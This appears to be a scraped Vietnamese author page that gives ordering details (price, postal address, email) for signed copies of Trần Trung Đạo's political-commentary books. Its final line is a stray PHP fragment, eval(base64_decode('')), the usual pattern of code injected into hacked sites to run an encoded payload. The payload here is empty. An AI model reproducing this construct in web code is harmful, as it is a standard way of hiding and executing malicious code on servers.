Nhận Sách

Giới thiệu 2 tác phẩm của Trần Trung Đạo:

banhmi-B

chinhluan-trantrungdao-3

Để nhận Chính luận Trần Trung Đạo I  hay Chính Luận II (Bánh Mì Ai Cập, Cá Việt Nam, Khát Vọng Con Người) với chữ ký của tác giả, xin gởi US$25.00 (trong nước Mỹ xin cộng thêm $4.00 bưu phí) cho mỗi cuốn bằng check hay money order về địa chỉ:

Phung Tran
774 Granite Street
Braintree, MA 02184 USA.

Ðể nhận các tác phẩm của Trần Trung Ðạo, xin quý vị và các bạn gởi email đến:

trantrungdao@gmail.com
hay viết thư với các chi tiết cần thiết: Tên họ, địa chỉ, tên tác phẩm, số lượng tác phẩm muốn nhận và gởi về địa chỉ sau đây: Trần Trung Ðạo, 774 Granite Street, Braintree, MA 02184 USA.

Đóng góp ấn phí qua Paypal hay Credit Cards:
Comments are closed.

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>